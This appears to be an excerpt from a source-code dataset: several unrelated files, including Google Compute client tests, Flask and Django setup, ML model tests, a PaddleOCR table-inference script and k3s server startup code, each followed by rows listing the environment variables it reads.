transports.ReservationsRestTransport(
credentials=cred, client_cert_source_for_mtls=client_cert_source_callback
)
mock_configure_mtls_channel.assert_called_once_with(client_cert_source_callback)
def test_reservations_host_no_port():
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com"
),
)
assert client.transport._host == "compute.googleapis.com:443"
def test_reservations_host_with_port():
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="compute.googleapis.com:8000"
),
)
assert client.transport._host == "compute.googleapis.com:8000"
def test_common_billing_account_path():
billing_account = "squid"
expected = "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
actual = ReservationsClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "clam",
}
path = ReservationsClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = ReservationsClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "whelk"
expected = "folders/{folder}".format(folder=folder,)
actual = ReservationsClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "octopus",
}
path = ReservationsClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = ReservationsClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "oyster"
expected = "organizations/{organization}".format(organization=organization,)
actual = ReservationsClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nudibranch",
}
path = ReservationsClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = ReservationsClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "cuttlefish"
expected = "projects/{project}".format(project=project,)
actual = ReservationsClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "mussel",
}
path = ReservationsClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = ReservationsClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "winkle"
location = "nautilus"
expected = "projects/{project}/locations/{location}".format(
project=project, location=location,
)
actual = ReservationsClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "scallop",
"location": "abalone",
}
path = ReservationsClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = ReservationsClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.ReservationsTransport, "_prep_wrapped_messages"
) as prep:
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.ReservationsTransport, "_prep_wrapped_messages"
) as prep:
transport_class = ReservationsClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
libstorage/drivers/storage/azureud/utils/utils_test.go
|
package utils
import (
"os"
"strconv"
"testing"
"github.com/stretchr/testify/assert"
"github.com/rexray/rexray/libstorage/api/context"
)
func skipTest(t *testing.T) {
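// Skip unless AZUREUD_UTILS_TEST parses as a truthy value; the test presumably needs a real Azure VM whose instance metadata can be queried.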
if ok, _ := strconv.ParseBool(os.Getenv("AZUREUD_UTILS_TEST")); !ok {
t.Skip()
}
}
func TestInstanceID(t *testing.T) {
skipTest(t)
iid, err := InstanceID(context.Background())
if !assert.NoError(t, err) {
t.FailNow()
}
t.Logf("instanceID=%s", iid.String())
}
|
[
"\"AZUREUD_UTILS_TEST\""
] |
[] |
[
"AZUREUD_UTILS_TEST"
] |
[]
|
["AZUREUD_UTILS_TEST"]
|
go
| 1 | 0 | |
crossword/__init__.py
|
import os
from flask import Flask
from flask_sslify import SSLify
app = Flask(__name__)
sslify = SSLify(app)
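# CONFIG_PATH selects the settings object to load; it falls back to the Travis (CI) configuration when the variable is unset.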
config_path = os.environ.get("CONFIG_PATH", "crossword.config.TravisConfig")
app.config.from_object(config_path)
from . import views
from . import filters
from . import login
|
[] |
[] |
[
"CONFIG_PATH"
] |
[]
|
["CONFIG_PATH"]
|
python
| 1 | 0 | |
ecomsite/ecomsite/wsgi.py
|
"""
WSGI config for ecomsite project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ecomsite.settings')
application = get_wsgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
tests/advanced_tests/advanced_install_tests.py
|
import datetime
import os
import random
import sys
import warnings
import numpy as np
from sklearn.model_selection import train_test_split
import tests.utils_testing as utils
from brainless import Predictor
from brainless.utils_models import load_ml_model
sys.path = [os.path.abspath(os.path.dirname(__file__))] + sys.path
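# Flag to the library that it is running inside the test suite (presumably so it can shorten training runs and trim output).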
os.environ['is_test_suite'] = 'True'
def test_feature_learning_getting_single_predictions_classification(model_name=None):
np.random.seed(0)
df_titanic_train, df_titanic_test = utils.get_titanic_binary_classification_dataset()
column_descriptions = {
'survived': 'output',
'sex': 'categorical',
'embarked': 'categorical',
'pclass': 'categorical'
}
ml_predictor = Predictor(
type_of_estimator='classifier', column_descriptions=column_descriptions)
# NOTE: this is bad practice to pass in our same training set as our fl_data set,
# but we don't have enough data to do it any other way
df_titanic_train, fl_data = train_test_split(df_titanic_train, test_size=0.2)
ml_predictor.train(
df_titanic_train, model_names=model_name, feature_learning=True, fl_data=fl_data)
file_name = ml_predictor.save(str(random.random()))
saved_ml_pipeline = load_ml_model(file_name)
os.remove(file_name)
try:
keras_file_name = file_name[:-5] + '_keras_deep_learning_model.h5'
os.remove(keras_file_name)
except:
pass
df_titanic_test_dictionaries = df_titanic_test.to_dict('records')
# 1. make sure the accuracy is the same
predictions = []
for row in df_titanic_test_dictionaries:
predictions.append(saved_ml_pipeline.predict_proba(row)[1])
print('predictions')
print(predictions)
first_score = utils.calculate_brier_score_loss(df_titanic_test.survived, predictions)
print('first_score')
print(first_score)
# Make sure our score is good, but not unreasonably good
lower_bound = -0.16
if model_name == 'DeepLearningClassifier':
lower_bound = -0.187
assert lower_bound < first_score < -0.133
# 2. make sure the speed is reasonable (do it a few extra times)
data_length = len(df_titanic_test_dictionaries)
start_time = datetime.datetime.now()
for idx in range(1000):
row_num = idx % data_length
saved_ml_pipeline.predict(df_titanic_test_dictionaries[row_num])
end_time = datetime.datetime.now()
duration = end_time - start_time
print('duration.total_seconds()')
print(duration.total_seconds())
# It's very difficult to set a benchmark for speed that will work across all machines.
# On my 2013 bottom of the line 15" MacBook Pro,
# this runs in about 0.8 seconds for 1000 predictions
# That's about 1 millisecond per prediction
# Assuming we might be running on a test box that's pretty weak, multiply by 3
# Also make sure we're not running unreasonably quickly
assert 0.2 < duration.total_seconds() < 15
# 3. make sure we're not modifying the dictionaries
# (the score is the same after running a few experiments as it is the first time)
predictions = []
for row in df_titanic_test_dictionaries:
predictions.append(saved_ml_pipeline.predict_proba(row)[1])
print('predictions')
print(predictions)
print('df_titanic_test_dictionaries')
print(df_titanic_test_dictionaries)
second_score = utils.calculate_brier_score_loss(df_titanic_test.survived, predictions)
print('second_score')
print(second_score)
# Make sure our score is good, but not unreasonably good
assert lower_bound < second_score < -0.133
def test_feature_learning_categorical_ensembling_getting_single_predictions_classification(
model_name=None):
np.random.seed(0)
df_titanic_train, df_titanic_test = utils.get_titanic_binary_classification_dataset()
column_descriptions = {
'survived': 'output',
'sex': 'categorical',
'embarked': 'categorical',
'pclass': 'categorical'
}
ml_predictor = Predictor(
type_of_estimator='classifier', column_descriptions=column_descriptions)
# NOTE: this is bad practice to pass in our same training set as our fl_data set,
# but we don't have enough data to do it any other way
df_titanic_train, fl_data = train_test_split(df_titanic_train, test_size=0.2)
ml_predictor.train_categorical_ensemble(
df_titanic_train,
model_names=model_name,
feature_learning=True,
fl_data=fl_data,
categorical_column='embarked')
file_name = ml_predictor.save(str(random.random()))
from brainless.utils_models import load_ml_model
saved_ml_pipeline = load_ml_model(file_name)
os.remove(file_name)
try:
keras_file_name = file_name[:-5] + '_keras_deep_learning_model.h5'
os.remove(keras_file_name)
except:
pass
df_titanic_test_dictionaries = df_titanic_test.to_dict('records')
# 1. make sure the accuracy is the same
predictions = []
for row in df_titanic_test_dictionaries:
predictions.append(saved_ml_pipeline.predict_proba(row)[1])
print('predictions')
print(predictions)
first_score = utils.calculate_brier_score_loss(df_titanic_test.survived, predictions)
print('first_score')
print(first_score)
# Make sure our score is good, but not unreasonably good
lower_bound = -0.175
if model_name == 'DeepLearningClassifier':
lower_bound = -0.245
if model_name == 'CatBoostClassifier':
lower_bound = -0.265
assert lower_bound < first_score < -0.14
# 2. make sure the speed is reasonable (do it a few extra times)
data_length = len(df_titanic_test_dictionaries)
start_time = datetime.datetime.now()
for idx in range(1000):
row_num = idx % data_length
saved_ml_pipeline.predict(df_titanic_test_dictionaries[row_num])
end_time = datetime.datetime.now()
duration = end_time - start_time
print('duration.total_seconds()')
print(duration.total_seconds())
# It's very difficult to set a benchmark for speed that will work across all machines.
# On my 2013 bottom of the line 15" MacBook Pro,
# this runs in about 0.8 seconds for 1000 predictions
# That's about 1 millisecond per prediction
# Assuming we might be running on a test box that's pretty weak, multiply by 3
# Also make sure we're not running unreasonably quickly
assert 0.2 < duration.total_seconds() < 15
# 3. make sure we're not modifying the dictionaries
# (the score is the same after running a few experiments as it is the first time)
predictions = []
for row in df_titanic_test_dictionaries:
predictions.append(saved_ml_pipeline.predict_proba(row)[1])
print('predictions')
print(predictions)
print('df_titanic_test_dictionaries')
print(df_titanic_test_dictionaries)
second_score = utils.calculate_brier_score_loss(df_titanic_test.survived, predictions)
print('second_score')
print(second_score)
# Make sure our score is good, but not unreasonably good
assert lower_bound < second_score < -0.147
def test_feature_learning_getting_single_predictions_regression(model_name=None):
np.random.seed(0)
df_boston_train, df_boston_test = utils.get_boston_regression_dataset()
column_descriptions = {'MEDV': 'output', 'CHAS': 'categorical'}
ml_predictor = Predictor(type_of_estimator='regressor', column_descriptions=column_descriptions)
# NOTE: this is bad practice to pass in our same training set as our fl_data set,
# but we don't have enough data to do it any other way
df_boston_train, fl_data = train_test_split(df_boston_train, test_size=0.2)
ml_predictor.train(
df_boston_train, model_names=model_name, feature_learning=True, fl_data=fl_data)
file_name = ml_predictor.save(str(random.random()))
# from brainless.utils_models import load_keras_model
# saved_ml_pipeline = load_keras_model(file_name)
saved_ml_pipeline = load_ml_model(file_name)
os.remove(file_name)
try:
keras_file_name = file_name[:-5] + '_keras_deep_learning_model.h5'
os.remove(keras_file_name)
except:
pass
df_boston_test_dictionaries = df_boston_test.to_dict('records')
# 1. make sure the accuracy is the same
predictions = []
for row in df_boston_test_dictionaries:
predictions.append(saved_ml_pipeline.predict(row))
first_score = utils.calculate_rmse(df_boston_test.MEDV, predictions)
print('first_score')
print(first_score)
# Make sure our score is good, but not unreasonably good
lower_bound = -4.0
assert lower_bound < first_score < -2.8
# 2. make sure the speed is reasonable (do it a few extra times)
data_length = len(df_boston_test_dictionaries)
start_time = datetime.datetime.now()
for idx in range(1000):
row_num = idx % data_length
saved_ml_pipeline.predict(df_boston_test_dictionaries[row_num])
end_time = datetime.datetime.now()
duration = end_time - start_time
print('duration.total_seconds()')
print(duration.total_seconds())
# It's very difficult to set a benchmark for speed that will work across all machines.
# On my 2013 bottom of the line 15" MacBook Pro,
# this runs in about 0.8 seconds for 1000 predictions
# That's about 1 millisecond per prediction
# Assuming we might be running on a test box that's pretty weak, multiply by 3
# Also make sure we're not running unreasonably quickly
assert 0.2 < duration.total_seconds() / 1.0 < 20
# 3. make sure we're not modifying the dictionaries
# (the score is the same after running a few experiments as it is the first time)
predictions = []
for row in df_boston_test_dictionaries:
predictions.append(saved_ml_pipeline.predict(row))
second_score = utils.calculate_rmse(df_boston_test.MEDV, predictions)
print('second_score')
print(second_score)
# Make sure our score is good, but not unreasonably good
assert lower_bound < second_score < -2.8
def test_feature_learning_categorical_ensembling_getting_single_predictions_regression(
model_name=None):
np.random.seed(0)
df_boston_train, df_boston_test = utils.get_boston_regression_dataset()
column_descriptions = {'MEDV': 'output', 'CHAS': 'categorical'}
ml_predictor = Predictor(type_of_estimator='regressor', column_descriptions=column_descriptions)
# NOTE: this is bad practice to pass in our same training set as our fl_data set,
# but we don't have enough data to do it any other way
df_boston_train, fl_data = train_test_split(df_boston_train, test_size=0.2)
ml_predictor.train_categorical_ensemble(
df_boston_train,
model_names=model_name,
feature_learning=True,
fl_data=fl_data,
categorical_column='CHAS')
# print('Score on training data')
# ml_predictor.score(df_boston_train, df_boston_train.MEDV)
file_name = ml_predictor.save(str(random.random()))
from brainless.utils_models import load_ml_model
saved_ml_pipeline = load_ml_model(file_name)
# with open(file_name, 'rb') as read_file:
# saved_ml_pipeline = dill.load(read_file)
os.remove(file_name)
try:
keras_file_name = file_name[:-5] + '_keras_deep_learning_model.h5'
os.remove(keras_file_name)
except:
pass
df_boston_test_dictionaries = df_boston_test.to_dict('records')
# 1. make sure the accuracy is the same
predictions = []
for row in df_boston_test_dictionaries:
predictions.append(saved_ml_pipeline.predict(row))
first_score = utils.calculate_rmse(df_boston_test.MEDV, predictions)
print('first_score')
print(first_score)
# Make sure our score is good, but not unreasonably good
lower_bound = -4.5
assert lower_bound < first_score < -3.4
# 2. make sure the speed is reasonable (do it a few extra times)
data_length = len(df_boston_test_dictionaries)
start_time = datetime.datetime.now()
for idx in range(1000):
row_num = idx % data_length
saved_ml_pipeline.predict(df_boston_test_dictionaries[row_num])
end_time = datetime.datetime.now()
duration = end_time - start_time
print('duration.total_seconds()')
print(duration.total_seconds())
# It's very difficult to set a benchmark for speed that will work across all machines.
# On my 2013 bottom of the line 15" MacBook Pro,
# this runs in about 0.8 seconds for 1000 predictions
# That's about 1 millisecond per prediction
# Assuming we might be running on a test box that's pretty weak, multiply by 3
# Also make sure we're not running unreasonably quickly
assert 0.2 < duration.total_seconds() / 1.0 < 15
# 3. make sure we're not modifying the dictionaries
# (the score is the same after running a few experiments as it is the first time)
predictions = []
for row in df_boston_test_dictionaries:
predictions.append(saved_ml_pipeline.predict(row))
second_score = utils.calculate_rmse(df_boston_test.MEDV, predictions)
print('second_score')
print(second_score)
# Make sure our score is good, but not unreasonably good
assert lower_bound < second_score < -3.4
def test_all_algos_classification(model_name=None):
np.random.seed(0)
df_titanic_train, df_titanic_test = utils.get_titanic_binary_classification_dataset()
column_descriptions = {
'survived': 'output',
'sex': 'categorical',
'embarked': 'categorical',
'pclass': 'categorical'
}
ml_predictor = Predictor(
type_of_estimator='classifier', column_descriptions=column_descriptions)
ml_predictor.train(
df_titanic_train,
model_names=[
'LogisticRegression', 'RandomForestClassifier', 'RidgeClassifier',
'GradientBoostingClassifier', 'ExtraTreesClassifier', 'AdaBoostClassifier',
'SGDClassifier', 'Perceptron', 'PassiveAggressiveClassifier', 'DeepLearningClassifier',
'XGBClassifier', 'LGBMClassifier', 'LinearSVC'
])
test_score = ml_predictor.score(df_titanic_test, df_titanic_test.survived)
print('test_score')
print(test_score)
# Linear models aren't super great on this dataset...
assert -0.215 < test_score < -0.131
def test_all_algos_regression():
# a random seed of 42 has ExtraTreesRegressor getting the best CV score,
# and that model doesn't generalize as well as GradientBoostingRegressor.
np.random.seed(0)
df_boston_train, df_boston_test = utils.get_boston_regression_dataset()
column_descriptions = {'MEDV': 'output', 'CHAS': 'categorical'}
ml_predictor = Predictor(type_of_estimator='regressor', column_descriptions=column_descriptions)
ml_predictor.train(
df_boston_train,
model_names=[
'LinearRegression', 'RandomForestRegressor', 'Ridge', 'GradientBoostingRegressor',
'AdaBoostRegressor', 'SGDRegressor', 'PassiveAggressiveRegressor', 'Lasso', 'LassoLars',
'ElasticNet', 'OrthogonalMatchingPursuit', 'BayesianRidge', 'ARDRegression',
'MiniBatchKMeans', 'DeepLearningRegressor', 'LGBMRegressor', 'XGBRegressor',
'LinearSVR', 'CatBoostRegressor'
])
test_score = ml_predictor.score(df_boston_test, df_boston_test.MEDV)
print('test_score')
print(test_score)
assert -3.4 < test_score < -2.8
def test_throws_warning_when_fl_data_equals_df_train():
df_titanic_train, df_titanic_test = utils.get_titanic_binary_classification_dataset()
column_descriptions = {
'survived': 'output',
'sex': 'categorical',
'embarked': 'categorical',
'pclass': 'categorical'
}
ml_predictor = Predictor(
type_of_estimator='classifier', column_descriptions=column_descriptions)
with warnings.catch_warnings(record=True) as w:
try:
ml_predictor.train(df_titanic_train, feature_learning=True, fl_data=df_titanic_train)
except KeyError as e:
pass
# We should not be getting to this line- we should be throwing an error above
for thing in w:
print(thing)
assert len(w) >= 1
assert True
|
[] |
[] |
[
"is_test_suite"
] |
[]
|
["is_test_suite"]
|
python
| 1 | 0 | |
tools/infer_table.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import os
import sys
import json
__dir__ = os.path.dirname(os.path.abspath(__file__))
sys.path.append(__dir__)
sys.path.append(os.path.abspath(os.path.join(__dir__, '..')))
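# 'auto_growth' tells Paddle to allocate GPU memory on demand instead of reserving a large fraction up front.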
os.environ["FLAGS_allocator_strategy"] = 'auto_growth'
import paddle
from paddle.jit import to_static
from ppocr.data import create_operators, transform
from ppocr.modeling.architectures import build_model
from ppocr.postprocess import build_post_process
from ppocr.utils.save_load import init_model
from ppocr.utils.utility import get_image_file_list
import tools.program as program
import cv2
def main(config, device, logger, vdl_writer):
global_config = config['Global']
# build post process
post_process_class = build_post_process(config['PostProcess'],
global_config)
# build model
if hasattr(post_process_class, 'character'):
config['Architecture']["Head"]['out_channels'] = len(
getattr(post_process_class, 'character'))
model = build_model(config['Architecture'])
init_model(config, model, logger)
# create data ops
transforms = []
use_padding = False
for op in config['Eval']['dataset']['transforms']:
op_name = list(op)[0]
if 'Label' in op_name:
continue
if op_name == 'KeepKeys':
op[op_name]['keep_keys'] = ['image']
if op_name == "ResizeTableImage":
use_padding = True
padding_max_len = op['ResizeTableImage']['max_len']
transforms.append(op)
global_config['infer_mode'] = True
ops = create_operators(transforms, global_config)
model.eval()
for file in get_image_file_list(config['Global']['infer_img']):
logger.info("infer_img: {}".format(file))
with open(file, 'rb') as f:
img = f.read()
data = {'image': img}
batch = transform(data, ops)
images = np.expand_dims(batch[0], axis=0)
images = paddle.to_tensor(images)
preds = model(images)
post_result = post_process_class(preds)
res_html_code = post_result['res_html_code']
res_loc = post_result['res_loc']
img = cv2.imread(file)
imgh, imgw = img.shape[0:2]
res_loc_final = []
for rno in range(len(res_loc[0])):
x0, y0, x1, y1 = res_loc[0][rno]
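# res_loc holds cell boxes normalized to [0, 1]; scale them to pixel coordinates and clamp to the image bounds before drawing.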
left = max(int(imgw * x0), 0)
top = max(int(imgh * y0), 0)
right = min(int(imgw * x1), imgw - 1)
bottom = min(int(imgh * y1), imgh - 1)
cv2.rectangle(img, (left, top), (right, bottom), (0, 0, 255), 2)
res_loc_final.append([left, top, right, bottom])
res_loc_str = json.dumps(res_loc_final)
logger.info("result: {}, {}".format(res_html_code, res_loc_final))
logger.info("success!")
if __name__ == '__main__':
config, device, logger, vdl_writer = program.preprocess()
main(config, device, logger, vdl_writer)
|
[] |
[] |
[
"FLAGS_allocator_strategy"
] |
[]
|
["FLAGS_allocator_strategy"]
|
python
| 1 | 0 | |
pkg/cli/server/server.go
|
package server
import (
"context"
"fmt"
net2 "net"
"os"
"path/filepath"
"strings"
systemd "github.com/coreos/go-systemd/daemon"
"github.com/pkg/errors"
"github.com/rancher/k3s/pkg/agent"
"github.com/rancher/k3s/pkg/cli/cmds"
"github.com/rancher/k3s/pkg/datadir"
"github.com/rancher/k3s/pkg/netutil"
"github.com/rancher/k3s/pkg/rootless"
"github.com/rancher/k3s/pkg/server"
"github.com/rancher/wrangler/pkg/signals"
"github.com/sirupsen/logrus"
"github.com/urfave/cli"
"k8s.io/apimachinery/pkg/util/net"
"k8s.io/kubernetes/pkg/master"
_ "github.com/go-sql-driver/mysql" // ensure we have mysql
_ "github.com/lib/pq" // ensure we have postgres
_ "github.com/mattn/go-sqlite3" // ensure we have sqlite
)
func Run(app *cli.Context) error {
if err := cmds.InitLogging(); err != nil {
return err
}
return run(app, &cmds.ServerConfig)
}
func run(app *cli.Context, cfg *cmds.Server) error {
var (
err error
)
if !cfg.DisableAgent && os.Getuid() != 0 && !cfg.Rootless {
return fmt.Errorf("must run as root unless --disable-agent is specified")
}
if cfg.Rootless {
dataDir, err := datadir.LocalHome(cfg.DataDir, true)
if err != nil {
return err
}
cfg.DataDir = dataDir
if err := rootless.Rootless(dataDir); err != nil {
return err
}
}
serverConfig := server.Config{}
serverConfig.ControlConfig.ClusterSecret = cfg.ClusterSecret
serverConfig.ControlConfig.DataDir = cfg.DataDir
serverConfig.ControlConfig.KubeConfigOutput = cfg.KubeConfigOutput
serverConfig.ControlConfig.KubeConfigMode = cfg.KubeConfigMode
serverConfig.ControlConfig.NoScheduler = cfg.DisableScheduler
serverConfig.Rootless = cfg.Rootless
serverConfig.TLSConfig.HTTPSPort = cfg.HTTPSPort
serverConfig.TLSConfig.HTTPPort = cfg.HTTPPort
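// Split the requested TLS SANs: anything that parses as an IP is recorded as a known IP, everything else is treated as a DNS name for the serving certificate.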
for _, san := range knownIPs(cfg.TLSSan) {
addr := net2.ParseIP(san)
if addr != nil {
serverConfig.TLSConfig.KnownIPs = append(serverConfig.TLSConfig.KnownIPs, san)
} else {
serverConfig.TLSConfig.Domains = append(serverConfig.TLSConfig.Domains, san)
}
}
serverConfig.TLSConfig.BindAddress = cfg.BindAddress
serverConfig.ControlConfig.HTTPSPort = cfg.HTTPSPort
serverConfig.ControlConfig.ExtraAPIArgs = cfg.ExtraAPIArgs
serverConfig.ControlConfig.ExtraControllerArgs = cfg.ExtraControllerArgs
serverConfig.ControlConfig.ExtraSchedulerAPIArgs = cfg.ExtraSchedulerArgs
serverConfig.ControlConfig.ClusterDomain = cfg.ClusterDomain
serverConfig.ControlConfig.Storage.Endpoint = cfg.StorageEndpoint
serverConfig.ControlConfig.Storage.CAFile = cfg.StorageCAFile
serverConfig.ControlConfig.Storage.CertFile = cfg.StorageCertFile
serverConfig.ControlConfig.Storage.KeyFile = cfg.StorageKeyFile
serverConfig.ControlConfig.AdvertiseIP = cfg.AdvertiseIP
serverConfig.ControlConfig.AdvertisePort = cfg.AdvertisePort
serverConfig.ControlConfig.BootstrapReadOnly = !cfg.StoreBootstrap
serverConfig.ControlConfig.FlannelBackend = cfg.FlannelBackend
serverConfig.ControlConfig.ExtraCloudControllerArgs = cfg.ExtraCloudControllerArgs
serverConfig.ControlConfig.DisableCCM = cfg.DisableCCM
serverConfig.ControlConfig.DisableNPC = cfg.DisableNPC
if cmds.AgentConfig.FlannelIface != "" && cmds.AgentConfig.NodeIP == "" {
cmds.AgentConfig.NodeIP = netutil.GetIPFromInterface(cmds.AgentConfig.FlannelIface)
}
if serverConfig.ControlConfig.AdvertiseIP == "" && cmds.AgentConfig.NodeIP != "" {
serverConfig.ControlConfig.AdvertiseIP = cmds.AgentConfig.NodeIP
}
if serverConfig.ControlConfig.AdvertiseIP != "" {
serverConfig.TLSConfig.KnownIPs = append(serverConfig.TLSConfig.KnownIPs, serverConfig.ControlConfig.AdvertiseIP)
}
_, serverConfig.ControlConfig.ClusterIPRange, err = net2.ParseCIDR(cfg.ClusterCIDR)
if err != nil {
return errors.Wrapf(err, "Invalid CIDR %s: %v", cfg.ClusterCIDR, err)
}
_, serverConfig.ControlConfig.ServiceIPRange, err = net2.ParseCIDR(cfg.ServiceCIDR)
if err != nil {
return errors.Wrapf(err, "Invalid CIDR %s: %v", cfg.ServiceCIDR, err)
}
_, apiServerServiceIP, err := master.DefaultServiceIPRange(*serverConfig.ControlConfig.ServiceIPRange)
if err != nil {
return err
}
serverConfig.TLSConfig.KnownIPs = append(serverConfig.TLSConfig.KnownIPs, apiServerServiceIP.String())
// If cluster-dns CLI arg is not set, we set ClusterDNS address to be ServiceCIDR network + 10,
// i.e. when you set service-cidr to 192.168.0.0/16 and don't provide cluster-dns, it will be set to 192.168.0.10
if cfg.ClusterDNS == "" {
serverConfig.ControlConfig.ClusterDNS = make(net2.IP, 4)
copy(serverConfig.ControlConfig.ClusterDNS, serverConfig.ControlConfig.ServiceIPRange.IP.To4())
serverConfig.ControlConfig.ClusterDNS[3] = 10
} else {
serverConfig.ControlConfig.ClusterDNS = net2.ParseIP(cfg.ClusterDNS)
}
if cfg.DefaultLocalStoragePath == "" {
dataDir, err := datadir.LocalHome(cfg.DataDir, false)
if err != nil {
return err
}
serverConfig.ControlConfig.DefaultLocalStoragePath = filepath.Join(dataDir, "/storage")
} else {
serverConfig.ControlConfig.DefaultLocalStoragePath = cfg.DefaultLocalStoragePath
}
noDeploys := make([]string, 0)
for _, noDeploy := range app.StringSlice("no-deploy") {
for _, splitNoDeploy := range strings.Split(noDeploy, ",") {
noDeploys = append(noDeploys, splitNoDeploy)
}
}
for _, noDeploy := range noDeploys {
if noDeploy == "servicelb" {
serverConfig.DisableServiceLB = true
continue
}
if !strings.HasSuffix(noDeploy, ".yaml") {
noDeploy = noDeploy + ".yaml"
}
serverConfig.ControlConfig.Skips = append(serverConfig.ControlConfig.Skips, noDeploy)
}
logrus.Info("Starting k3s ", app.App.Version)
notifySocket := os.Getenv("NOTIFY_SOCKET")
os.Unsetenv("NOTIFY_SOCKET")
ctx := signals.SetupSignalHandler(context.Background())
certs, err := server.StartServer(ctx, &serverConfig)
if err != nil {
return err
}
logrus.Info("k3s is up and running")
if notifySocket != "" {
os.Setenv("NOTIFY_SOCKET", notifySocket)
systemd.SdNotify(true, "READY=1\n")
}
if cfg.DisableAgent {
<-ctx.Done()
return nil
}
ip := serverConfig.TLSConfig.BindAddress
if ip == "" {
ip = "127.0.0.1"
}
url := fmt.Sprintf("https://%s:%d", ip, serverConfig.TLSConfig.HTTPSPort)
token := server.FormatToken(serverConfig.ControlConfig.Runtime.NodeToken, certs)
agentConfig := cmds.AgentConfig
agentConfig.Debug = app.GlobalBool("debug")
agentConfig.DataDir = filepath.Dir(serverConfig.ControlConfig.DataDir)
agentConfig.ServerURL = url
agentConfig.Token = token
agentConfig.DisableLoadBalancer = true
agentConfig.Rootless = cfg.Rootless
if agentConfig.Rootless {
// let agent specify Rootless kubelet flags, but not unshare twice
agentConfig.RootlessAlreadyUnshared = true
}
return agent.Run(ctx, agentConfig)
}
func knownIPs(ips []string) []string {
ips = append(ips, "127.0.0.1")
ip, err := net.ChooseHostInterface()
if err == nil {
ips = append(ips, ip.String())
}
return ips
}
|
[
"\"NOTIFY_SOCKET\""
] |
[] |
[
"NOTIFY_SOCKET"
] |
[]
|
["NOTIFY_SOCKET"]
|
go
| 1 | 0 | |
upup/pkg/fi/cloudup/template_functions.go
|
/*
Copyright 2019 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
/******************************************************************************
Template Functions are what map functions in the models, to internal logic in
kops. This is the point where we connect static YAML configuration to dynamic
runtime values in memory.
When defining a new function:
- Build the new function here
- Define the new function in AddTo()
dest["MyNewFunction"] = MyNewFunction // <-- Function Pointer
******************************************************************************/
package cloudup
import (
"encoding/base64"
"encoding/json"
"fmt"
"os"
"path"
"sort"
"strconv"
"strings"
"text/template"
"github.com/Masterminds/sprig/v3"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/util/sets"
"k8s.io/klog/v2"
kopscontrollerconfig "k8s.io/kops/cmd/kops-controller/pkg/config"
"k8s.io/kops/pkg/apis/kops"
apiModel "k8s.io/kops/pkg/apis/kops/model"
"k8s.io/kops/pkg/apis/kops/util"
"k8s.io/kops/pkg/dns"
"k8s.io/kops/pkg/featureflag"
"k8s.io/kops/pkg/model"
"k8s.io/kops/pkg/resources/spotinst"
"k8s.io/kops/pkg/wellknownports"
"k8s.io/kops/upup/pkg/fi"
"k8s.io/kops/upup/pkg/fi/cloudup/awsup"
"k8s.io/kops/upup/pkg/fi/cloudup/gce"
"k8s.io/kops/util/pkg/env"
)
// TemplateFunctions provides a collection of methods used throughout the templates
type TemplateFunctions struct {
model.KopsModelContext
cloud fi.Cloud
}
// AddTo defines the available functions we can use in our YAML models.
// If we are trying to get a new function implemented it MUST
// be defined here.
func (tf *TemplateFunctions) AddTo(dest template.FuncMap, secretStore fi.SecretStore) (err error) {
cluster := tf.Cluster
dest["EtcdScheme"] = tf.EtcdScheme
dest["SharedVPC"] = tf.SharedVPC
dest["ToJSON"] = tf.ToJSON
dest["UseBootstrapTokens"] = tf.UseBootstrapTokens
dest["UseEtcdTLS"] = tf.UseEtcdTLS
// Remember that we may be on a different arch from the target. Hard-code for now.
dest["replace"] = func(s, find, replace string) string {
return strings.Replace(s, find, replace, -1)
}
dest["join"] = func(a []string, sep string) string {
return strings.Join(a, sep)
}
